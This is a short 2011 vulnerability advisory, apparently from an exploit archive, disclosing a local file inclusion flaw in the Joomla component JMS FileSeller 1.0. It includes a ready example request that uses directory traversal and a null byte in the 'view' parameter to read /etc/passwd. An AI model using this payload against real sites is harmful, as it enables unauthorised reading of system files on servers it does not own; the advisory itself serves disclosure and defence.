Joomla Component com_jmsfileseller Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component com_jmsfileseller Local File Inclusion Vulnerability
# Published : 2011-05-28
# Author :
# Previous Title : Ultimate PHP Board 2.2.7 Broken Authentication and Session Management
# Next Title : Joomla 1.0 Component jDownloads Arbitrary File Upload Vulnerability

# Exploit Title: Joomla Component com_jmsfileseller Local File Inclusion Vulnerability 
# Date: 28.05.2011
# Author: Valentin
# Category: webapps/0day
# Version: 1.0

# Tested on:
# CVE :  
# Code : 


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information 
Advisory/Exploit Title = Joomla Component com_msfileseller Local File Inclusion Vulnerability 
Author = Valentin Hoebel
Contact = valentin@xenuser.org


[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = JMS FileSeller
Vendor = Joommasters team
Vendor Website = http://joommasters.com/
Affected Version(s) = 1.0


[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> Local File Inclusion
URL: index.php?option=com_jmsfileseller&view=<LFI value>&cat_id=1&Itemid=27
Vulnerable parameters: view
Example: index.php?option=com_jmsfileseller&view=../../../etc/passwd%00&cat_id=12&Itemid=27


[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 28.05.2011


[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz = cr4wl3r, JosS, Todd and Josh from packetstormsecurity.org, exploit-db.com


[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]